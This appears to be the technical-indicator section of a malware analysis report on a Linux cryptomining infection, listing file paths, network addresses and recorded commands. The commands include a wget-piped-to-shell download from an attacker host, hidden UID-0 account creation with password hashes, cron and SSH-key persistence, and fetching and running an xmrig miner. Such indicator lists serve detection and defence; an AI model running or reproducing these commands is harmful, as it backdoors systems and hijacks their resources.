Technical Information
- /etc/cron.hourly/1
- /etc/cron.hourly/.placeholder
- /etc/cron.hourly/0
- /etc/cron.daily/0
- /etc/cron.weekly/0
- /etc/cron.monthly/0
- /root/.ssh/authorized_keys
- sh -c wget http://cf0.pw/0/etc/cron.hourly/0 -O- 2>/dev/null|sh>/dev/null 2>&1
- wget http://cf0.pw/0/etc/cron.hourly/0 -O-
- sh
- sed -i /^[^:]\+:x:0:/{/^root:/!d} /etc/passwd
- sed -i /^$/d /etc/passwd
- sed -i /^$/d /etc/shadow
- useradd -u 0 -g 0 -o -l -d /root -N -M -p $1$f344a097$L.vnLN/nzsnLirq5nMTBg. sudev
- nscd -i passwd
- nscd -i group
- useradd -u 0 -g 0 -o -l -d /root -N -M -p $1$.bHtz1HY$eNtJowby1b0WVTgQT2bLu/ jewbags
- rm -f /etc/cron.hourly/1
- mkdir -p /root
- mkdir -p /root/.ssh
- wget http://cf0.pw/log/ -O /dev/null
- chmod +x /etc/cron.hourly/0
- chmod +x /etc/cron.daily/0
- chmod +x /etc/cron.weekly/0
- chmod +x /etc/cron.monthly/0
- apt-get install wget curl -y
- /usr/bin/dpkg --print-foreign-architectures
- /usr/lib/apt/methods/http
- pkill -9 xmrig
- grep rbdYSfTEtykGg /root/.ssh/authorized_keys
- mkdir -p /usr/libexec
- chmod 755 /root /root/.ssh /root/.ssh/authorized_keys
- chown root:root /root /root/.ssh /root/.ssh/authorized_keys
- rm -f /usr/libexec/x
- wget http://cf0.pw/0/xmr.tgz -O /usr/libexec/x
- ps auxw
- grep xmrig
- grep -v grep
- tar zxvf x
- gzip -d
- cat /dev/urandom
- tr -dc _A-Za-z0-9
- head -c15
- sed s/c285345992f8ae31/thIZ16p7bmj8I6y/ -i config.json
- ./xmrig
- touch /tmp/sdxsdf
- /bin/sh ./xmrig
- killall -9 xmrig
- /usr/lib/apt/methods/http
- /etc/sed68Pi9e
- /etc/sedfh8r3f
- /etc/sed081S2p
- /etc/passwd+
- /etc/shadow+
- /etc/subuid+
- /etc/subgid+
- /etc/cron.hourly/0
- /etc/cron.daily/0
- /etc/cron.weekly/0
- /etc/cron.monthly/0
- /root
- /root/.ssh
- /root/.ssh/authorized_keys
- /usr/libexec/xmrig-2.4.3/xmrig
- /usr/libexec/xmrig-2.4.3/config.json
- /usr/libexec/xmrig-2.4.3
- /usr/libexec/xmrig-2.4.3/sedp1fY0q
- /root/.ssh
- /usr/libexec
- /usr/libexec/xmrig-2.4.3
- /etc/passwd.lock"
- /etc/group.lock"
- /etc/gshadow.lock"
- /etc/subuid.lock"
- /etc/subgid.lock"
- /etc/shadow.lock"
- /etc/sed68Pi9e
- /etc/sedfh8r3f
- /etc/sed081S2p
- /etc/.pwd.lock
- /etc/passwd.694
- /etc/group.694
- /etc/gshadow.694
- /etc/subuid.694
- /etc/subgid.694
- /etc/shadow.694
- /etc/passwd-
- /etc/passwd+
- /etc/shadow-
- /etc/shadow+
- /etc/subuid-
- /etc/subuid+
- /etc/subgid-
- /etc/subgid+
- /etc/passwd.699
- /etc/group.699
- /etc/gshadow.699
- /etc/subuid.699
- /etc/subgid.699
- /etc/shadow.699
- /etc/ld.so.preload
- /var/lib/dpkg/lock
- /var/cache/apt/archives/lock
- /usr/libexec/x
- /usr/libexec"/xmrig-2.4.3/xmrig
- /usr/libexec/xmrig-2.4.3/xmrig
- /usr/libexec"/xmrig-2.4.3/config.json
- /usr/libexec/xmrig-2.4.3/config.json
- /usr/libexec/xmrig-2.4.3"/sedp1fY0q
- /usr/libexec/xmrig-2.4.3/sedp1fY0q
- /tmp/sdxsdf
- /etc/passwd.694"
- /etc/group.694"
- /etc/gshadow.694"
- /etc/subuid.694"
- /etc/subgid.694"
- /etc/shadow.694"
- /etc/shadow.lock"
- /etc/passwd.lock"
- /etc/group.lock"
- /etc/gshadow.lock"
- /etc/subuid.lock"
- /etc/subgid.lock"
- /etc/passwd.699"
- /etc/group.699"
- /etc/gshadow.699"
- /etc/subuid.699"
- /etc/subgid.699"
- /etc/shadow.699"
- /etc/cron.hourly/1"
- /usr/libexec/x"
- <LOCAL_DNS_SERVER>
- [2#########:1:216:35ff:fe7f:6ceb]:80
- [2#########:0:216:35ff:fe7f:be4f]:80
- [2#######8:dc41:100::233]:80
- 21#.##1.132.32:80
- 21#.##6.149.233:80
- 21#.##1.132.250:80
- cf#.####/etc/cron.hourly/0
- cf#.pw/log/
- ft#.##.######.#####ebian/pool/main/w/wget/wget_1.16-1%2bdeb8u1_i386.deb
- se######.######.######ol/updates/main/c/curl/libcurl3_7.38.0-4%2bdeb8u5_i386.deb
- se######.######.#####ool/updates/main/c/curl/curl_7.38.0-4%2bdeb8u5_i386.deb
- cf#.##/0/xmr.tgz
- cf#.pw
- ft#.##.debian.org
- se####ty.debian.org